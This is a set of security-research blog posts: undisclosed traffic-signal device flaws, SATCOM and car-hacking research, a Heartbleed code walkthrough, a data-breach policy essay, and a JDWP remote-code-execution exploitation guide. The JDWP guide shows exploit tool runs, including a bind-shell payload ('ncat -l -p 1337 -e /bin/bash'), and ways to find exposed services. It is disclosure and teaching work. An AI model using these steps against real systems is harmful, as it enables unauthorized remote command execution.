INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Probably many of you have watched scenes from “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals by just hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t exactly do the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from up to 1 or 2 miles away with a better drone and hardware equipment, I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal and anyone will be able to get drones on demand soon, I would be worried about attacks from the sky in the US.
It might also be possible to create self-replicating malware (worm) that can infect these vulnerable devices in order to launch attacks affecting traffic control systems later. The exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how affected some cities are. The following is from documentation from vulnerable vendors:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions)  

and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific nor technical details here (for that, you will have to wait and go to Infiltrate 2014 in a couple of weeks. What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31st, 2013). I was told by ICS-CERT that the vendor said that they didn’t think the issues were critical nor even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes that was the answer, I couldn’t believe it. 
 
Regarding another vulnerability, the vendor said that it’s already fixed on newer versions of the device. But there is a big problem, you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices are vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic control systems, they have a direct influence on the actions and decisions of these systems.
I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said, if the vendor doesn’t think they are vulnerable then OK, I’m done with this; I have tried hard, and I don’t want to continue wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is not critical nor important to them, then there isn’t anything else I can do except to go public.
 
This should be another wake up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request to providers of government devices/products to take security and security vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
Electronic signs
It’s possible to make traffic lights (depending on the configuration) stay green more or less time, stay red and not change to green (I bet many of you have experienced something like this as a result of driving during non-traffic hours late at night or being on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions and to make ramp meters allow cars on the freeway faster or slower than needed. 
 
These traffic problems could cause real issues, even deadly ones, by causing accidents or blocking ambulances, fire fighters, or police cars going to an emergency call.
I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected and could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. This doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching an attack is simple. The only thing that could be complex is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies when there is no apparent reason and closely watch the device’s behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.
INSIGHTS | April 23, 2014

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”

By Christophe Alladoum – @_hugsy_
 
TL;DR: turn any open JDWP service into reliable remote code execution (exploit inside)
 
<plagiarism> Kids, I’m gonna tell you an incredible story. </plagiarism>
This is the story of how I came across an interesting protocol during a recent code review engagement for IOActive and turned it into a reliable way to execute remote code. In this post, I will explain the Java Debug Wire Protocol (JDWP) and why it is interesting from a penetration tester’s point of view. I will cover some JDWP internals and how to use them to perform code execution, resulting in a reliable and universal exploitation script. So let’s get started.
 
Disclaimer: This post provides techniques and exploitation code that should not be used against vulnerable environments without prior authorization. The author cannot be held responsible for any private use of the tool or techniques described therein.
 
Note: As I was looking into JDWP, I stumbled upon two brief posts on the same topic (see [5] (in French) and [6]). They are worth reading, but do not expect that a deeper understanding of the protocol itself will allow you to reliably exploit it. This post does not reveal any 0-day exploits, but instead thoroughly covers JDWP from a pentester/attacker perspective. 

Java Debug Wire Protocol

Java Platform Debug Architecture (JPDA)
JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture (JPDA). The following is a diagram of the overall architecture:
 

 

 
The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp (or -agentlib). For example, starting a Tomcat server with remote debugging enabled would look like this:
 

 

As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
  • It is a packet-based network binary protocol.
  • It is mostly synchronous. The debugger sends a command over JDWP and expects to receive a reply. However, some commands, like Events, do not expect a synchronous response. They will send a reply when specific conditions are met. For example, a BreakPoint is an Event.
  • It does not use authentication.
  • It does not use encryption.
 
All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.


Handshake
JDWP dictates[9] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger (client) sends the 14-character ASCII string “JDWP-Handshake”. 
The Debuggee (server) responds to this message by sending the exact same string. 
 
The following scapy[3] trace shows the initial two-way handshake:

 

root:~/tools/scapy-hg # ip addr show dev eth0 | grep “inet “
    inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0
root:~/tools/scapy-hg # ./run_scapy
Welcome to Scapy (2.2.0-dev)
>>> sniff(filter=”tcp port 8000 and host 192.168.2.9″, count=8)
<Sniffed: TCP:9 UDP:1 ICMP:0 Other:0>
>>> tcp.hexraw()
0000 15:49:30.397814 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 S
0001 15:49:30.402445 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 SA
0002 15:49:30.402508 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A
0003 15:49:30.402601 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake

0004 15:49:30.407553 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0005 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0006 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake
0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A

An experienced security auditor may have already realised that such a simple handshake offers a way to easily uncover live JDWP services on the Internet. Just send one simple probe and check for the specific response. 

 
More interestingly, a behavior was observed on the IBM Java Development Kit when scanning with ShodanHQ with the server “talking” first with the very same banner mentioned. As a consequence, there is a totally passive way to discover an active JDWP service (this is covered later on in this article with the help of the (in)famous Shodan).


Communication
JDWP defines messages[10] involved in communications between the Debugger and the Debuggee. 
 
The messages follow a simple structure, defined as follows:
 

 

The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table. 

CommandSet
   Command
0x40 
   Action to be taken by the JVM (e.g. setting a BreakPoint)
0x40–0x7F     
   Provide event information to the debugger (e.g. the JVM has       hit a BreakPoint and is waiting for further actions)
0x80
   Third-party extensions
 
Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
  • VirtualMachine/IDSizes defines the size of the data structures handled by the JVM. This is one of the reasons why the nmap script jdwp-exec.nse[11] does not work, since the script uses hardcoded sizes.
  • ClassType/InvokeMethod allows you to invoke a static function.
  • ObjectReference/InvokeMethod allows you to invoke a function from an instantiated object in the JVM.
  • StackFrame/(Get|Set)Values provides pushing/popping capabilities from threads stack.
  • Event/Composite forces the JVM to react to specific behaviors declared by this command. This command is a major key for debugging purposes as it allows, among many other things, setting breakpoints, single-stepping through the threads during runtime, and being notified when accessing/modifying values in the exact same manner as GDB or WinDBG.
 
Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
  • VirtualMachine/CreateString allows  you to transform a string into a java.lang.String living in the JVM runtime.
  • VirtualMachine/RedefineClasses allows you to install new class definitions.
 
“All your JDWP are belong to us”
As we have seen, JDWP provides built-in commands to load arbitrary classes into the JVM memory and invoke already existing and/or newly loaded bytecode. The following section will cover the steps for creating exploitation code in Python, which behaves as a partial implementation of a JDI front end in order to be as reliable as possible. The main reason for this standalone exploit script is that, as a pentester, I like “head-shot” exploits. That is, when I know for sure an environment/application/protocol is vulnerable, I want to have my tool ready to exploit it right away (i.e. no PoC, which is basically the only thing that existed so far). So now that we have covered the theory, let’s get into the practical implementation.
 
When faced with an open JDWP service, arbitrary command execution is exactly five steps away (or with this exploit, only one command line away). Here is how it would go down:
 
1. Fetch Java Runtime reference
The JVM manipulates objects through their references. For this reason, our exploit must first obtain the reference to the java.lang.Runtime class. From this class, we need the reference to the getRuntime() method. This is performed by fetching all classes (AllClasses packet) and all methods in the class we are looking for (ReferenceType/Methods packet).
 
2. Setup breakpoint and wait for notification (asynchronous calls)
This is the key to our exploit. To invoke arbitrary code, we need to be in a running thread context. To do so, a hack is to setup a breakpoint on a method which is known to be called at runtime. As seen earlier, a breakpoint in JDI is an asynchronous event whose type is set to BREAKPOINT(0x02). When hit, the JVM sends an EventData packet to our debugger, containing our breakpoint ID, and more importantly, the reference to the thread which hit it.

 

It is therefore a good idea to set it on a frequently called method, such as java.net.ServerSocket.accept(), which is very likely to be called every time the server receives a new network connection. However, one must bear in mind that it could be any method existing at runtime.
 
3. Allocating a Java String object in Runtime to carry out the payload
We will execute code in the JVM runtime, so all of our manipulated data (such as string) must exist in the JVM runtime (i.e. possess an runtime reference). This is done quite easily by sending a CreateString command.
 

 

 
4. Get Runtime object from breakpoint context
At this point we have almost all of the elements we need for a successful, reliable exploitation. What we are missing is a Runtime object reference. Obtaining it is easy, and we can simply execute in the JVM runtime the java.lang.Runtime.getRuntime() static method[8] by sending a ClassType/InvokeMethod packet and providing the Runtime class and thread references.
 
5. Lookup and invoke exec() method in Runtime instance
The final step is simply looking for the exec() method in the Runtime static object obtained for the previous step and invoking it (by sending a ObjectReference/InvokeMethod packet) with the String object we created in step three. 
 
Et voilà !! Swift and easy.
 
As a demonstration, let’s start a Tomcat running with JPDA “debug mode” enabled:
root@pwnbox:~/apache-tomcat-6.0.39# ./bin/catalina.sh jpda start
 
We execute our script without a command to execute, to simply get general system information:
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9 
[+] Targeting ‘192.168.2.9:8000’
[+] Reading settings for ‘Java HotSpot(TM) 64-Bit Server VM – 1.6.0_65’
[+] Found Runtime class: id=466
[+] Found Runtime.getRuntime(): id=7facdb6a8038
[+] Created break event id=2
[+] Waiting for an event on ‘java.net.ServerSocket.accept’
## Here we wait for breakpoint to be triggered by a new connection ##
[+] Received matching event from thread 0x8b0
[+] Found Operating System ‘Mac OS X’
[+] Found User name ‘pentestosx’
[+] Found ClassPath ‘/Users/pentestosx/Desktop/apache-tomcat-6.0.39/bin/bootstrap.jar’
[+] Found User home directory ‘/Users/pentestosx’
[!] Command successfully executed


Same command line, but against a Windows system and breaking on a totally different method:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –break-on ‘java.lang.String.indexOf’
[+] Targeting ‘192.168.2.8:8000’
[+] Reading settings for ‘Java HotSpot(TM) Client VM – 1.7.0_51’
[+] Found Runtime class: id=593
[+] Found Runtime.getRuntime(): id=17977a9c
[+] Created break event id=2
[+] Waiting for an event on ‘java.lang.String.indexOf’
[+] Received matching event from thread 0x8f5
[+] Found Operating System ‘Windows 7’
[+] Found User name ‘hugsy’
[+] Found ClassPath ‘C:UsershugsyDesktopapache-tomcat-6.0.39binbootstrap.jar’
[+] Found User home directory ‘C:Usershugsy’
[!] Command successfully executed


We execute our exploit to spawn a bind shell with the payload  “ncat -e /bin/bash -l -p 1337”, against a Linux system:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –cmd ‘ncat -l -p 1337 -e /bin/bash’
[+] Targeting ‘192.168.2.8:8000’
[+] Reading settings for ‘OpenJDK Client VM – 1.6.0_27’
[+] Found Runtime class: id=79d
[+] Found Runtime.getRuntime(): id=8a1f5e0
[+] Created break event id=2
[+] Waiting for an event on ‘java.net.ServerSocket.accept’
[+] Received matching event from thread 0x82a
[+] Selected payload ‘ncat -l -p 1337 -e /bin/bash’
[+] Command string object created id:82b
[+] Runtime.getRuntime() returned context id:0x82c
[+] found Runtime.exec(): id=8a1f5fc
[+] Runtime.exec() successful, retId=82d
[!] Command successfully executed
 
Success, we now have a listening socket!
root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
tcp        0      0 0.0.0.0:1337         0.0.0.0:*               LISTEN      19242/ncat      
tcp6       0      0 :::1337              :::*                    LISTEN      19242/ncat     


Same win on MacOSX:
pentests-Mac:~ pentestosx$ lsof | grep LISTEN
ncat      4380 pentestosx    4u    IPv4 0xffffff800c8faa40       0t0        TCP *:menandmice-dns (LISTEN)
 
A link to full exploitation script is provided here[1]. 
 
The final exploit uses those techniques, adds a few checks, and sends suspend/resume signals to cause as little disruption as possible (it’s always best not to break the application you’re working on, right?). It acts in two modes: 
  • “Default” mode is totally non intrusive and simply executes Java code to get local system information (perfect for a PoC to a client).
  • Passing the “cmd” option executes a system command on the remote host and is therefore more intrusive. The command is done with the privileges the JVM is running with.
 
This exploit script was successfully tested against:
  • Oracle Java JDK 1.6 and 1.7
  • OpenJDK 1.6
  • IBM JDK 1.6
 
As Java is platform-independent by design, commands can be executed on any operating system that Java supports.
 
Well this is actually good news for us pentesters: open JDWP service means reliable RCE
 
So far, so good.


What about real-life exploitation?

As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would (and should) mostly block the port it is running on.
 
But this does not mean that JDWP cannot be found in the wild:
  • At the time of writing this article, a quick search on ShodanHQ[4] immediately reveals about 40 servers sending the JDWP handshake:

 

This is actually an interesting finding because, as we’ve seen before, it is supposed to be the client-side (debugger) that initiates dialogue.
  • GitHub[7] also reveals a significant number of potentially vulnerable open-source applications:

 

  • masscan-ing the Internet looking for specific ports (tcp/8000, tcp/8080, tcp/8787, tcp/5005) revealed many hosts (which cannot be reported here) responding to the initial handshake.
  • “Enterprise” applications were found in the wild running a JDWP service *by default* (finding the actual port number is left as an exercise to the curious reader).
 
These are just a few ways to discover open JDWP services on the Internet. This is a great reminder that applications should regularly undergo thorough security reviews, production environments should have any debugging functionality turned off, and firewalls should be configured to restrict access to services required for normal operation only. Allowing anybody to connect to a JDWP service is exactly the same as allowing a connection to a gdbserver service (in what may be a more stable way).
 
I hope you enjoyed reading this article as much as I enjoyed playing with JDWP. 
 
To y’all mighty pirates, happy JDWP pwning !!


Thanks

I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests.


References:
  1. https://github.com/IOActive/jdwp-shellifier
  2. http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
  3. http://www.secdev.org/projects/scapy(no longer active)
  4. http://www.shodanhq.com/search?q=JDWP-HANDSHAKE 
  5. http://www.hsc-news.com/archives/2013/000109.html (no longer active) 
  6. http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt 
  7. https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
  8. http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
  9. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
  10. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
  11. http://nmap.org/nsedoc/scripts/jdwp-exec.html
RESEARCH | April 17, 2014

A Wake-up Call for SATCOM Security

During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted.
 
We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have an upper-hand.
 
Satellite Communications (SATCOM) plays a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include:
  • Aerospace
  • Maritime
  • Military and governments
  • Emergency services
  • Industrial (oil rigs, gas, electricity)
  • Media
It is important to mention that certain international safety regulations for ships such as GMDSS or aircraft’s ACARS rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position of where the plane crashed. 
 
IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. 
 
Thus, in the last quarter of 2013 I decided to research into a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals.  
 
In previous blog posts I’ve explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different than the previous research: in most cases the analysis was performed by reverse engineering the firmware statically.

 
What about the results? 
 
Insecure and undocumented protocols, backdoors, hard-coded credentials…mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors.
 
Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities.
 
I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned.
The following white paper comprehensively explains all the aspects of this research IOActive_SATCOM_Security_WhitePaper
INSIGHTS | April 10, 2014

Bleeding Hearts

The Internet is ablaze with talk of the “heartbleed” OpenSSL vulnerability disclosed yesterday (April 7, 2014) here: https://www.openssl.org/news/secadv_20140407.txt
 
While the bug itself is a simple “missing bounds check,” it affects quite a number of high-volume, big business websites.
 
Make no mistake, this bug is BAD. It’s sort of a perfect storm: the bug is in a library used to encrypt sensitive data (OpenSSL), and it allows attackers a peak into a server’s memory, potentially revealing that same sensitive data in the clear.
 
Initially, it was reported that private keys could be disclosed via this bug, basically allowing attackers to decrypt captured SSL sessions. But as more people start looking at different sites, other issues have been revealed – servers are leaking information ranging from user sessions (https://www.mattslifebytes.com/?p=533) to encrypted search queries (duckduckgo) and passwords (https://twitter.com/markloman/status/453502888447586304). The type of information accessible to an attacker is entirely a function of what happens to be in the target server’s memory at the time the attacker sends the request.
 
While there’s lot of talk about the bug and its consequences, I haven’t seen much about what actually causes the bug. Given that the bug itself is pretty easy to understand (and even spot!), I thought it would be worthwhile to walk through the vulnerability here for those of you who are curious about the why, and not just the how-to-fix.
 
 
The Bug
 
The vulnerable code is found in OpenSSL’s TLS Heartbeat Message handling routine – hence the clever “heartbleed” nickname. The TLS Heartbeat protocol is defined in RFC 6520 – “Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) Heartbeat Extension”.  
 
Before we get into the OpenSSL code, we should examine what this protocol looks like.
 
The structure of the Heartbeat message is very simple, consisting of a 8-bit message type, a 16-bit payload length field, the payload itself, and finally a sequence of padding bytes. In pseudo-code, the message definition looks like this (copied from the RFC):
 
 
The type (line 2) is simply 1 or 2, depending on whether the message is a request or a response.
 
The payload_length (line 3) indicates the size of the payload part of the message, which follows immediately. Being a 16-bit unsigned integer, its maximum value is 2^16-1 (which is 65535). If you’ve done some other reading about this bug, you’ll recognize the 64k as being the upper limit on how much data can be accessed by an attacker per attack sent.
 
The payload (line 4) is defined to be “arbitrary content” of length payload_length.
 
And padding (line 5) is “random content” at least 16 bytes long, and “MUST be ignored.”
 
Easy enough!
 
Now I think it should be noted here that the RFC itself appears sound – it describes appropriate behavior for what an implementation of the protocol should and shouldn’t do. In fact, the RFC explicitly states that “If the payload_length of a received HeartbeatMessage is too large, the received HeartbeatMessage MUST be discarded silently.” Granted, “too large” isn’t defined, but I digress…
 
There is one last part of the RFC that’s important for understanding this bug: The RFC states that “When a HeartbeatRequest message is received … the receiver MUST send a corresponding HeartbeatResponse message carrying an exact copy of the payload of the received HeartbeatRequest.” This is important in understanding WHY vulnerable versions of OpenSSL are sending out seemingly arbitrary blocks of memory.
 
Now, on to OpenSSL code!  
 
Here’s a snippet from the DTLS Heartbeat handling function in (the vulnerable) openssl-1.0.1fssld1_both.c:
 
 
If you’re not familiar with reading C, this can be a lot to digest. The bug will become clearer if we go through this function piece by piece. We’ll start at the top…
 
 
 
This part just defines local variables for the function. The most important one here is the char pointer p (line 1457), which points to the heartbeat message the attacker controls. hbtype (line 1458)will hold the HeartbeatMessageType value mentioned in the RFC, and payload (line 1459)will hold the payload_length value. Don’t let the fact that the payload_length value is being stored in the payload variable confuse you!
 
 
 
Here, the first byte of the message is copied into the hbtype variable (line 1463), and the 16-bit payload-length is copied from p (the attacker-controlled message) to the payload variable using the n2s function (line 1464). The n2s function simply converts the value from the sequence of bits in the message to a number the program can use in calculations. Finally, the pl pointer is set to point to the payload section of the attacker-controlled message (line 1465).
 
 
On line 1474, a variable called buffer is defined and then allocated (line 1481) an area of memory using the attacker-controlled payload variable to calculate how much memory should be allocated. Then, on line 1482, the bp pointer is set to point to the buffer that was just allocated for the server’s response.
As an aside, if the payload_length field which gets stored in the payload variable were greater than 16-bits (say, 32 or 64-bits instead), we’d be looking at another couple of vulnerabilities: either an integer overflow leading to a buffer overflow, or potentially a null-pointer dereference. The exact nature and exploitability of either of these would depend upon the platform itself, and the exact implementation of OPENSSL_malloc. Payload_length *is* only 16-bits however, so we’ll continue…
 
 
This code snippet shows the server building the response. It’s here that this bug changes from being an attacker-controlled length field leading to Not Very Much into a serious information disclosure bug causing a big stir. Line 1485 simply sets the type of the response message pointed to by bp to be a Heartbeat Response. According to the RFC, the payload_length should be next, and indeed – it is being copied over to the bp response buffer via the s2n function on line 1486. The server is just copying the value the attacker supplied, which was stored in the payload variable. Finally, the payload section of the attacker message (pointed to by pl, on line 1465) is copied over to the response buffer, pointed to by the bp variable (again, according to the RFC specification), which is then sent back to the attacker.  
 
And herein lies the vulnerability – the attacker-controlled payload variable (which stores the payload_length field!) is used to determine exactly how many bytes of memory should be copied into the response buffer, WITHOUT first being checked to ensure that the payload_length supplied by the attacker is not bigger than the size of the attacker-supplied payload itself.
 
This means that if an attacker sends a payload_length greater than the size of the payload, any data located in the server’s memory after the attacker’s payload would be copied into the response. If the attacker set the payload_length to 10,000 bytes and only provided a payload of 10 bytes, then a little less than an extra 10,000 bytes of server memory would be copied over to the response buffer and sent back to the attacker. Any sensitive information that happened to be hanging around in the process (including private keys, unencrypted messages, etc.) is fair game. The only variable is what happens to be in memory. In playing with some of the published PoCs against my own little test server (openssl s_server FTW), I got a whole lot of nothing back, in spite of targeting a vulnerable version, because the process wasn’t doing anything other than accepting requests. To reiterate, the data accessed entirely depends on what’s in memory at the time of the attack.
 
 
Testing it yourself
 
There are a number of PoCs put up yesterday and today that allow you to check your own servers. If you’re comfortable using an external service, you can check out http://filippo.io/Heartbleed/. Or you can grab filippo’s golang code from https://github.com/FiloSottile/Heartbleed, compile it yourself, and test on your own. If golang is not your cup of tea, I’d check out the simple Python version here: https://gist.github.com/takeshixx/10107280. All that’s required is a Python2 installation.
 
Happy Hunting!
INSIGHTS | April 8, 2014

Car Hacking 2: The Content

Does everyone remember when those two handsome young gentlemen controlled automobiles with CAN message injection (https://www.youtube.com/watch?v=oqe6S6m73Zw)? I sure do. However, what if you don’t have the resources to purchase a car, pay for insurance, repairs to the car, and so on? 
 
Fear not Internet! 
 
Chris and Charlie to the rescue. Last week we presented our new automotive research at Syscan 2014. To make a long story short, we provided the blueprints to setup a small automotive network outside the vehicle so security researchers could start investigating Autosec (TM pending) without requiring the large budget needed to procure a real automobile. (Update: Andy Greenberg just released an article explaining our work, http://www.forbes.com/sites/andygreenberg/2014/04/08/darpa-funded-researchers-help-you-learn-to-hack-a-car-for-a-tenth-the-price/)
 
 
Additionally, we provided a solution for a mobile testing platform (a go-cart) that can be fashioned with ECUs from a vehicle (or purchased on Ebay) for testing that requires locomotion, such as assisted braking and lane departure systems. 
 
 
For those of you that want the gritty technical details, download this paper. As always, we’d love feedback and welcome any questions. 
 

 

INSIGHTS | March 26, 2014

A Bigger Stick To Reduce Data Breaches

On average I receive a postal letter from a bank or retailer every two months telling me that I’ve become the unfortunate victim of a data theft or that my credit card is being re-issued to prevent against future fraud. When I quiz my friends and colleagues on the topic, it would seem that they too suffer the same fate on a reoccurring schedule. It may not be that surprising to some folks. 2013 saw over 822 million private records exposed according to the folks over at DatalossDB – and that’s just the ones that were disclosed publicly.

It’s clear to me that something is broken and it’s only getting worse. When it comes to the collection of personal data, too many organizations have a finger in the pie and are ill equipped (or prepared) to protect it. In fact I’d question why they’re collecting it in the first place. All too often these organizations – of which I’m supposedly a customer – are collecting personal data about “my experience” doing business with them and are hoping to figure out how to use it to their profit (effectively turning me in to a product). If these corporations were some bloke visiting a psychologist, they’d be diagnosed with a hoarding disorder. For example, consider what criteria the DSM-5 diagnostic manual uses to identify the disorder:

  • Persistent difficulty discarding or parting with possessions, regardless of the value others may attribute to these possessions.
  • This difficulty is due to strong urges to save items and/or distress associated with discarding.
  • The symptoms result in the accumulation of a large number of possessions that fill up and clutter active living areas of the home or workplace to the extent that their intended use is no longer possible.
  • The symptoms cause clinically significant distress or impairment in social, occupational, or other important areas of functioning.
  • The hoarding symptoms are not due to a general medical condition.
  • The hoarding symptoms are not restricted to the symptoms of another mental disorder.

Whether or not the organizations hording personal data know how to profit from it or not, it’s clear that even the biggest of them are increasingly inept at protecting it. The criminals that are pilfering the data certainly know what they’re doing. The gray market for identity laundering has expanded phenomenonly since I talked about at Blackhat in 2010.

We can moan all we like about the state of the situation now, but we’ll be crying in the not too distant future when statistically we progress from being a victim to data loss, to being a victim of (unrecoverable) fraud.

The way I see it, there are two core components to dealing with the spiraling problem of data breaches and the disclosure of personal information. We must deal with the “what data are you collecting and why?” questions, and incentivize corporations to take much more care protecting the personal data they’ve been entrusted with.

I feel that the data hording problem can be dealt with fairly easily. At the end of the day it’s about transparency and the ability to “opt out”. If I was to choose a role model for making a sizable fraction of this threat go away, I’d look to the basic component of the UK’s Data Protection Act as being the cornerstone of a solution – especially here in the US. I believe the key components of personal data collection should encompass the following:

  • Any organization that wants to collect personal data must have a clearly identified “Data Protection Officer” who not only is a member of the executive board, but is personally responsible for any legal consequences of personal data abuse or data breaches.
  • Before data can be collected, the details of the data sought for collection, how that data is to be used, how long it would be retained, and who it is going to be used by, must be submitted for review to a government or legal authority. I.e. some third-party entity capable of saying this is acceptable use – a bit like the ethics boards used for medical research etc.
  • The specifics of what data a corporation collects and what they use that data for must be publicly visible. Something similar to the nutrition labels found on packaged foods would likely be appropriate – so the end consumer can rapidly discern how their private data is being used.
  • Any data being acquired must include a date of when it will be automatically deleted and removed.
  • At any time any person can request a copy of any and all personal data held by a company about themselves.
  • At any time any person can request the immediate deletion and removal of all data held by a company about themselves.

If such governance existed for the collection and use of personal data, then the remaining big item is enforcement. You’d hope that the morality and ethics of corporations would be enough to ensure they protected the data entrusted to them with the vigor necessary to fight off the vast majority of hackers and organized crime, but this is the real world. Apparently the “big stick” approach needs to be reinforced.

A few months ago I delved in to how the fines being levied against organizations that had been remiss in doing all they could to protect their customer’s personal data should be bigger and divvied up. Essentially I’d argue that half of the fine should be pumped back in to the breached organization and used for increasing their security posture.

Looking at the fines being imposed upon the larger organizations (that could have easily invested more in protecting their customers data prior to their breaches), the amounts are laughable. No noticeable financial pain occurs, so why should we be surprised if (and when) it happens again. I’ve become a firm believer that the fines businesses incur should be based upon a percentage of valuation. Why should a twenty-billion-dollar business face the same fine for losing 200,000,000 personal records as a ten-million-dollar business does for losing 50,000 personal records? If the fine was something like two-percent of valuation, I can tell you that the leadership of both companies would focus more firmly on the task of keeping yours and mine data much safer than they do today. 

